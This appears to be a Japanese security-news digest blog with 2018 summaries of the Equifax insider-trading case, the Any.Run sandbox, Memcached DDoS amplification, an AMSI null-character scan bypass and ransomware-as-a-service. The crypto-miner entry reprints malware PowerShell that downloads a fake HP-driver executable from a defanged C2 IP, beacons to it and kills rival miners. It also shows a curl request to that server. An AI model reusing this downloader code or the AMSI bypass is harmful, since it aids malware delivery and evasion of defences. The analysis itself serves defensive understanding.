2018-03-15 セキュリティニュースまとめ: 個人情報大量漏洩事件の大手消費者信用情報会社 Equifax の前 CIO が事件発覚前のインサイダー取引疑惑で起訴される
膨大な情報漏えい事件を起こした Equifax の前 CIO、事件の公表前に株を売却したインサイダー取引の疑いで証券取引委員会に起訴される
元記事
概要
- 2017 年 9 月 7 日、米国の大手消費者信用情報会社 Equifax は、Apache Struts サーバーへの既知の脆弱性 (CVE-2017-5638) へのパッチ適用遅れという人為的ミスにより 1 億 4550 万人分の個人情報が大量流出させたことを発表 した
- 影響を受けた個人への連絡を事件発覚後 4 ヶ月も遅らせるなど、事後対応のまずさでも批判を集めた
- 起訴されたのは事件発覚当時、同社の CIO への登用が予定されていた Jun Ying 氏
- Ying 氏による株取引内容を確認した Equifax 自身が法執行機関に連絡を行った
- 他に 3 人の執行取締役が事件発覚前に株を売却していたが、これらはいずれも事件と無関係に予定されていたものと Equifax は説明している
2018-03-08 セキュリティニュースまとめ: ロシア発マルウェア解析用サンドボックス公開 コミュニティ版は機能制限はあるが無料で利用可
記事
記事で言及されているサービス Any.Run
Any.Run とは何か
- マルウェア解析用サンドボックスで、自動化されたものとちがい、サンドボックス上でマウスのクリックなどのインタラクティブ操作が可能
- コミュニティ版が無料で公開された
- コミュニティ版では 16MB までの検体ファイルを 32-bit 版の Windows 7 OS 上で実行・解析できる
- コミュニティ版以外の有料プランは 3 種類あり、順次公開予定
サイトの FAQ より
サービス
全体について
ANY.RUN って何?
ANY.RUN でどんなことができるの?
- 新しい(未知の)悪意のあるオブジェクトを詳細分析を手軽に行えるし、サイバー侵害事件の調査にも利用できる。
ANY.RUN は誰が利用することを想定しているの?
- 個人リサーチャー、会社や企業、セキュリティ部門、CERT、CIRT、SOC、IR などで、自動化サンドボックスでは不十分と感じている方。 Among our users, there are individual researchers, businesses, corporations, security departments, CERTs, CIRTs, SOCs, and IRs and those, for whom automatic sandbox is not enough.
他のサンドボックスサービスとどう違うの?
- インタラクティブに分析を行えるのが強み。最終的にはタスク実行中に解析の全情報を提供したい。
分析機能について
ANY.RUN が分析可能なコンテンツの種類は何?
どんな OS をサポートしているの?
- Windows OS の Windows XP から Windows 10 まで、32 ビット版、64 ビット版をサポート(筆者注記: コミュニティ版は Windows 7 32-bit 環境のみ)。
ANY.RUN で分析する内容って?
同一ファイルを何度も調査できる?
- できる。対象ファイルを新しいタスクで再実行すれば良い。
どうやってゲスト OS とインタラクティブにやりとりするの?
- タスクがインタラクションに対応しているので開始したらいつでも介入できる。実際の PC 上でやるときのように操作すればよい。
ANY.RUN にはアーカイブをアップロードできる?
タスク実行中にファイルを再度開くこともできる?
- できる。実際の PC 上でやるときのように操作すればよい。
タスク実行中にシステムを再起動することはできる?
- できる。再起動はサポートされている (有料機能)
インストール済みのソフトにはどんなものがある?
- タスク実行前にゲスト OS にインストール済みのソフトは 3 種類。[Pre-installed soft set] で設定。
- [Clean]: インストール済みのソフトウェアなし
- [Office]: OS に Microsoft Office がインストールされている
- [Complete]: OS に、Microsoft Office、ブラウザ、スカイプなど、一般的ユーザーが利用する標準的なソフトがインストールされている
- タスク実行前にゲスト OS にインストール済みのソフトは 3 種類。[Pre-installed soft set] で設定。
SMART タイムアウトって何?
- SMART タイムアウトは時間制限なしで利用するための機能。タスクはシステムを 30 秒間使わなかった場合や重要なイベントが発生しないときに自動的にオフになるため (有料機能)
ファイルが正常に実行されませんが?
- ANY.RUN はリアルタイムかつインタラクティブなサービスなので、実際の PC 上でやるようにユーザー自身がファイルを実行する必要がある。
- 拡張子が正しくないケースも考えられる。その場合、タスクの設定メニューにある拡張子を実際のタイプに変更するオプションを利用する。
- 対象ファイルが 32-bit 版 OS、64-bit 版 OS など実行環境と合致しているかどうかも確認すること。
特定タスクで他の人とコラボすることはできる?
- タスク実行前にチームワーキングモードを利用すればコラボレーションは可能。コラボしたい人に共有用リンクを送付すればよい。
レポート機能について
どんなレポートフォーマットがあるの?
- 現時点では、PCAP、JSON、PDF フォーマットを用意している。
想定されているソフトでファイルが開かないが、どうしたら変更できる?
- 選択したタスクにソフトがインストールされていない可能性があるので、ゲスト OS の種類で「Complete」を選ぶか、必要なソフトをインストールする。
- アップロードされたファイルの拡張子に問題があることも考えられるので、ファイルの種類と拡張子の種類が合致しているか確認し、合致していなければ変更する。
既知のウイルスについての悪意のある活動がレポートに含まれないのはなぜ?
Verdict (判定) って何?
- Verdict はタスク実行中に発生したユーザアクションを含む全イベントから出された結論を述べたもの。
料金プラン、仕様
注意事項
- テストで利用する場合、機密事項の含まれているファイルなどは使用しないこと。検体はコミュニティで共有されます。
2018-03-04 セキュリティニュースまとめ: 暗号通貨マイニング マルウェア同士のリソース争奪が確認される
一次情報
The Crypto Miners Fight For CPU Cycles - SANS Internet Storm Center
概要
- 暗号通貨 (=仮想通貨) のマイニング (=採掘) を行うマルウェア (=マイナー) が自身の利益を最大化するためには、感染ホストの CPU リソースを独占することが望ましい
- このため、感染ホストに他の同種マルウェアが見つかった場合はそのプロセスを停止し、その CPU リソースを奪うように設計されている暗号通貨マイニング マルウェアが見つかった
- 今後はこのような動きをするマイナーが増えるだろう
マイニング (採掘) を行うマルウェア「マイナー」とは
- 通貨の取引台帳は、ブロックチェーン技術により膨大な数のホストに分散して記載されている
- 新たな通貨を獲得するにはこれらの分散した取引台帳の整合性を誰よりも速く計算により検証確認する必要がある
- 最速で計算した者だけが、既存ブロックチェーンの最後のブロックとして自身のブロックを新たに追記し、通貨を得ることができる仕組み
参考: coinpost.jp
なぜ「マイナー」が流行るのか
- 新規コインを発掘 (マイニング) するには、誰よりも速く取引台帳の検証・ブロックの追加を行う必要がある
- そのためには、自身が保有するコンピュータの計算リソースを最大化しなければならない
- 自身の作成した「マイナー」マルウェアに感染させることで、より多くのホストから計算リソース (CPU リソース) を奪うことができる
なぜほかの「マイナー」のプロセスを停止するのか
- すでにほかのマイナーに感染している場合、大部分の CPU リソースをそちらに奪われて新規通貨の獲得の障害になる
- 他のマイナーが存在する場合はそのプロセスを停止することでこうした障害を取り除こうとしている
他のマイナーを停止する PowerShell の内容 (原著者の抜粋内容をまとめて転記したもので、この間にもコードが存在する可能性あり)
HP のドライバを偽装した 32-bit/64-bit のプログラムをダウンロードする部分
$HSST = "http://45[.]123.190.116" $CALLBACK = $HSST $DEFAULT_RFILE = "$HSST/files/hpw64" $OTHERS_RFILE = "$HSST/files/hpw32" $LFILE_NAME = "HPDriver.exe" $LFILE_PATH = "$env:TMP\$LFILE_NAME" $DOWNLOADER = New-Object System.Net.WebClient $SYSTEM_BIT = [System.IntPtr]::Size if ( $SYSTEM_BIT -eq 8 ) { $DOWNLOADER.DownloadFile($DEFAULT_RFILE, $LFILE_PATH) } else { $DOWNLOADER.DownloadFile($OTHERS_RFILE, $LFILE_PATH) }
C2 サーバーへの HTTP リクエストを送信する部分
if ( !(Get-Process AMDDriver64 -ErrorAction SilentlyContinue) ) { $DOWNLOADER.DownloadString("$CALLBACK/?info=w0") cmd.exe /c "$LFILE_PATH -B" } else { $DOWNLOADER.DownloadString("$CALLBACK/?info=w9") }
他のマイナーのプロセスを停止させる部分
$counters = (Get-Counter '\Process(*)\% Processor Time').CounterSamples $malwares = [redacted] $malwares2 = "Silence","Carbon","xmrig32","nscpucnminer64","mrservicehost","servisce","svchosts3","svhosts","system64","systemiissec", \ "taskhost","vrmserver","vshell","winlogan","winlogo","logon","win1nit","wininits","winlnlts","taskngr","tasksvr","mscl","cpuminer","sql31", \ "taskhots", "svchostx","xmr86","xmrig","xmr","win1ogin","win1ogins","ccsvchst","nscpucnminer64","update_windows" foreach ($counter in $counters) { if ($counter.CookedValue -ge 40) { if ($counter.InstanceName -eq "idle" -Or $counter.InstanceName -eq "_total") { continue } foreach ($malware in $malwares) { if ($counter.InstanceName -eq $malware) { Stop-Process -processname $counter.InstanceName -Force } } } foreach ($malware2 in $malwares2) { if ($counter.InstanceName -eq $malware2) { Stop-Process -processname $counter.InstanceName -Force } } }
今回見つかった暗号通貨マイニングを行う PowerShell コードの特徴
- 接続先は 45[.]123.190.116
- CPU リソースを最大化するため自分自身以外のマイナーが稼働しているかどうかを検出し、停止することでより多くの通貨を獲得しようとする
- 32 ビット版と64 ビット版が存在し、環境に応じてどちらかをダウンロードする
- ヒューレット・パッカード (HP) 社のドライバ (hpdriver.exe) に偽装したマイナー
- すでに VirusTotal 上でサンプル[1][2]が確認されている
- PE ファイル内にマイニング設定がハードコートされており、一次情報の執筆時点もまだアカウントはアクティブ
- AMDDriver64 プロセス (AMDDriver64.exe: これもマイニングを行うマルウェア) が存在するかどうかを確認し、存在する場合としない場合とで C2 サーバに対する HTTP リクエストの情報を変更している。 ** 原著者が出した HTTP リクエストのテストではリクエストへの応答で得られた情報なし。info のパラメータとして渡されている w0 と w9 についての詳細は不明:
# torify curl -v -A "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0)" http://45[.]123.190.116/?info=w9 * Trying 45[.]123.190.116... * TCP_NODELAY set * Connected to 45[.]123.190.116 (45[.]123.190.116) port 80 (#0) > GET /?info=w9 HTTP/1.1 > Host: 45[.]123.190.116 > User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) > Accept: */* > < HTTP/1.1 200 OK < Server: nginx/1.10.3 (Ubuntu) < Date: Sun, 04 Mar 2018 09:31:25 GMT < Content-Type: text/html < Content-Length: 0 < Last-Modified: Thu, 01 Mar 2018 09:15:51 GMT < Connection: keep-alive < ETag: "5a97c4c7-0" < Accept-Ranges: bytes < * Connection #0 to host 45[.]123.190.116 left intact
$malwares2 = "Silence","Carbon","xmrig32","nscpucnminer64","mrservicehost","servisce","svchosts3","svhosts","system64","systemiissec", \ "taskhost","vrmserver","vshell","winlogan","winlogo","logon","win1nit","wininits","winlnlts","taskngr","tasksvr","mscl","cpuminer","sql31", \ "taskhots", "svchostx","xmr86","xmrig","xmr","win1ogin","win1ogins","ccsvchst","nscpucnminer64","update_windows"
2018-02-28 セキュリティニュースまとめ: Memcached を DDoS 攻撃用増幅ベクタとして利用する大規模攻撃が初めて観測される
一次ソース
New High-Volume Vector: Memcached Reflection Amplification Attacks www.link11.com
引用記事
概要
- 2018 年 2 月下旬、Link11 Security Operation Center が udp/11211 をソースポートとする未知の大規模 UDP 攻撃を確認
- 初期分析結果から Link11 の DDoS のセキュリティ専門家は「Memcached リフレクション攻撃」と名付ける
- Memcached を DDoS 増幅ベクタとして利用した例はこれまで知られていない
- これまで利用されなかった理由はなんら技術的な制約ではなく単に「攻撃に利用することを思いつかなかったから」と見られる
- Memcached は本来、ファイアウォールの内側、LAN 内で利用されるものだが、不適切な設定のまま放置されインターネットからアクセス可能なサーバーが多数存在
- ピーク時の攻撃トラフィック量は 400Gbps を超える
- Memcached を利用した DDoS 攻撃の利点は入力バイト数が非常に小さくても DNS や NTP など定形応答を行うサービスよりずっと大規模な増幅が可能なことで、論理的にはほんの10-20バイト程度の入力から 400MB、500MB といったサイズへに増幅することが可能
- 充分にマシンパワーのあるコンピュータ 1 台など非常に限られたリソースで大規模な DDoS 攻撃が可能
対策
- インターネットに自社のホストが Memcached サービスを露出していないか確認する
- src ポートが upd/11211 の通信を FW、ルータなどネットワーク境界で遮断する
- DDoS 対策サービスを利用する
- 帯域が充分確保されていることを確認する
2018-02-21 セキュリティニュースまとめ: [2 月のセキュリティ更新で修正済]Windows 10 に「セキュリティソフトウェアによるコードのスキャンがヌル文字以降バイパスされてしまう問題」が見つかる
一次ソース
元記事
概要
- Windows 10 にセキュリティ機能を提供する API であるところの「アンチ マルウェア スキャン インタフェース (AMSI)」に、「対象コードにヌル文字が含まれているとその文字以降のコードが AMSI からセキュリティソフトウェアに渡されずスキャンがバイパスされる問題」が確認された
- Microsoft は当該問題を修正し、2 月のセキュリティ更新で配布したが、パッチを適用していない環境を狙って今後の攻撃に悪用されるだろう
AMSI とは
- 「アンチ マルウェア スキャン インタフェース (AMSI) 」は Windows 10 で提供されているセキュリティ メカニズム
- AMSI はシステム上の特定イベントを検出し、検出結果をマルウェアのスキャンを行うセキュリティソフトウェアに通知する
- 通知されたセキュリティソフトウェアは、受け取ったイベントの内容に応じ、コンテンツをスキャンしてブロックするなどの処理を行う
- 中でも利用頻度の高いイベントは PowerShell (System.Management.Automation.dll) や Windows Script Host (例えば jscript.dll) などのスクリプト実行前に当該スクリプトの内容をセキュリティソフトウェアに渡してスキャンさせる機能
AMSI に確認された問題
- PowerShell コードにはヌル文字 (\0) を含めることができるが、AMSI がこの点を考慮していない
- System.Management.Automation.dll が AmsiScanString API を呼び出すと、AMSI (amsi.dll) の AmsiScanString API は渡された内容を LPCWSTR 型として受け取ってしまう(下記コードの string がそれ)
- このさい、コンテンツにヌル文字が含まれていると、最初のヌル文字がコンテンツの終端とみなされる
- したがってヌル文字以降のコンテンツがセキュリティソフトウェアに渡されず、スキャンされない
- これを悪用し、ヌル文字以降に悪意のあるコードを格納しておけば、AMSI 経由でのイベント検出を回避できる
HRESULT WINAPI AmsiScanString( _In_ HAMSICONTEXT amsiContext, _In_ LPCWSTR string, // ★最初のヌル文字で終端される _In_ LPCWSTR contentName, _In_opt_ HAMSISESSION session, _Out_ AMSI_RESULT *result );
Microsoft による修正
- System.Management.Automation.dll は AmsiScanString API のかわりに AmsiScanBuffer API を呼び出ように修正
- AmsiScanBuffer API はコンテンツを LPCWSTR 型ではなく PVOID 型のバイトシーケンスとして受け取り、コンテンツにヌル文字が含まれていても終端とみなさない
- これにより AMSI からセキュリティソフトウェアにコンテンツの内容が正しく渡されるようになる
HRESULT WINAPI AmsiScanBuffer( _In_ HAMSICONTEXT amsiContext, _In_ PVOID buffer, // ★ヌル文字があっても終端とみなさない _In_ ULONG length, _In_ LPCWSTR contentName, _In_opt_ HAMSISESSION session, _Out_ AMSI_RESULT *result );
- Windows Script Host の場合 PowerShell と異なり最初にヌル文字が出てきたところでインタプリタの実行が停止するため、この問題による影響は受けない
Windows 10 の一般ユーザー、セキュリティソフトウェアのベンダー、リサーチャーがとるべき対策
Windows 10 の一般ユーザー
- 2 月のセキュリティ更新をただちに適用する
セキュリティソフトウェアのベンダー
- PowerShell からコンテンツを ASMI 経由で受け取ってスキャンしている製品は、ヌル文字が含まれている場合に正常に動作するかどうか確認する
セキュリティソフトウェアの利用者
- 使用中の製品のベンダに本事象による影響の有無を確認する
セキュリティセキュリティリサーチャー
- 利用中の AMSI を利用するセキュリティソフトウェアがヌル文字を含むコンテンツをスキャンしたさい、問題なく動作するかどうか確認する
2018-02-20 セキュリティニュースまとめ: 米国、エネルギーインフラのためのサイバーセキュリティオフィスを設立
米国、エネルギーインフラのためのサイバーセキュリティオフィスを設立
元記事
概要
- 米国エネルギー省にエネルギー・インフラ向けのサイバーセキュリティオフィスを設立
- 名称: Office of Cybersecurity, Energy Security, and Emergency Response (CESER)
- エネルギーインフラのセキュリティに対する自然災害・人的脅威の両方に備え、より統率のとれた対応をすることが目的
- 予算 9600 万ドル (日本円でおよそ 102 億円)を 2019 年度のエネルギー省のサイバーセキュリテイl・エネルギーセキュリティ関連予算として計上
- CESER では重要グリッドインフラのサイバーセキュリティ向上や災害耐性獲得のための研究開発を行う
- 2015 年ウクライナの電力グリッドへのサイバー攻撃により 23 万人への電力供給が途絶された事件が既知の最初のサイバー攻撃
- 今後も継続してこうした攻撃が行われると予測される
- カスペルスキーラボ ICS CERT の予測
- ICS/SCADA (産業用制御システムおよび監視制御システム) は開発がセキュアでないことが多く、パッチの適用が遅く、脆弱性のあるアプリケーションが多く、中には更新が一切行えないケースもあるが、インターネット経由でアクセス可能な ICS は年々増加する傾向にある
EU の場合
- EU NIS Directive (EU Network and Information Security Directive) や European Union Agency for Network and Information Security (ENISA) が ICS/SCADA システムのセキュリティ対策にあたっている
- 世界経済フォーラムでの指摘「重要インフラシステムへの攻撃の成功率は低いが、個々の攻撃が組み合わされるため、攻撃の数の多さからリスクは増大している」「インターネットに接続される機器は増え続けており脆弱性の悪用ペースも早くなってきているので、そうした攻撃が局所的・一時的なものですまず、大規模で取り返しのつかない惨事につながる可能性がある」
2018-02-19 セキュリティニュースまとめ: Saturn RaaS (Ransomeware as a Service) が前金不要で無料のビジネスモデルを採用、GrandCrab ランサムウェアもランサムウェアのアフィリエイトサービス市場に参入
Saturn RaaS (Ransomeware as a Service) が前金不要で無料のビジネスモデルを採用、GrandCrab ランサムウェアもランサムウェアのアフィリエイトサービス市場に参入
元記事
概要
前金不要の新しいビジネスモデル
- Saturn という名で呼ばれるランサムウェアをアフィリエイト サービスとして提供するポータルサイトがダークウェブで新たに発見される
- これまでの主な RaaS とは異なるビジネスモデルを採用している
- 感染した被害者は su34pwhpcafeiztt[.]onion にアクセスして「身代金」を支払う
- 支払われた身代金はポータルサイト作成者の Bitcoin アカウントに送信され、スタブファイルを生成した登録ユーザーが身代金の 70%、ポータルサイト側が 30% を受け取るようになっている
- 7:3 のモデルは他の Cerber を利用した RaaS ビジネスモデルと同等
ランサムウェア GandCrab も RaaS で提供開始
- ペルーのセキュリティリサーチャー David Montenegro 氏が GrandCrab ランサムウェアも RaaS モデルに参入したことを発見
- ロシア語を話すユーザーの集う悪名高いフォーラムで売り出されていた
GandCrab Ransomware 28.01.2018 - Thanks to a Cyber criminal who registered your access in his own AZORutl I was able to login in the Underground forum where I found this information about GandCrab Ransomware .. 🧐🧐 .. RaaS GandCrab .. 🕵️♂️🕵️♂️ pic.twitter.com/INPdatqufr
— David Montenegro (@CryptoInsane) 2018年2月1日